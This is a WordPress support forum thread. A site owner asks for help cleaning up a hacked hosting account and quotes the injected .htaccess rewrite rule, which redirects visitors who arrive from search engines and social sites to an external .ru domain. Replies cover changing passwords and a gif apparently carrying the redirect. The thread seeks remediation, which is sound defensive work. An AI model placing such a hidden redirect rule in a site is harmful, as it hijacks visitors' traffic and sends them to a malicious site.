One of my hosting account was hacked and infected with vbzbb-naagz malicious code. It infected all my WP sites hosted under that account. I guess one wordpress site I had was running 1 year old version of WP. Ofcource now I will install a fresh and new version of WP on all infected sites. The htaccess files had this code injected.
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*) RewriteRule ^(.*)$ http://vbzbb-naagz.ru/gzuzu?11 [R=301,L] </IfModule>
Can someone help in finding a cleanup solution for this.
Arie Putranto
Member
Posted 11 months ago #
It's definitely not WordPress being hack, but your host being compromised. Ask your host to help out, but changing your passwords (cpanel, ftp, email, wp-admin etc) will be good.
Its not the host.
A strange thing happened. I deleted all the files and installed a fresh WP. The site worked fine but as soon as I uploaded my child theme it again got redirected to unwanted site. I checked all the files and there was no suspicious code.
One of my friend helped me and asked me to comment out the logo.gif in header. I did and the site was fine. Conclusion the gif image was infected with some redirection code. Thats something worrying. I have more than 100 images on this site, how do I scan which image is corrupted and how do I remove the injected code from the image ?
pacificnewmedia
Member
Posted 11 months ago #
It's in your htaccess file - scroll far to the right to see the 301 redirects that send them to that site
Please post your URL name.
Made the hosting company delete everything and install a fresh copy. Also it seemed there was some redirection code injected in the gif image.
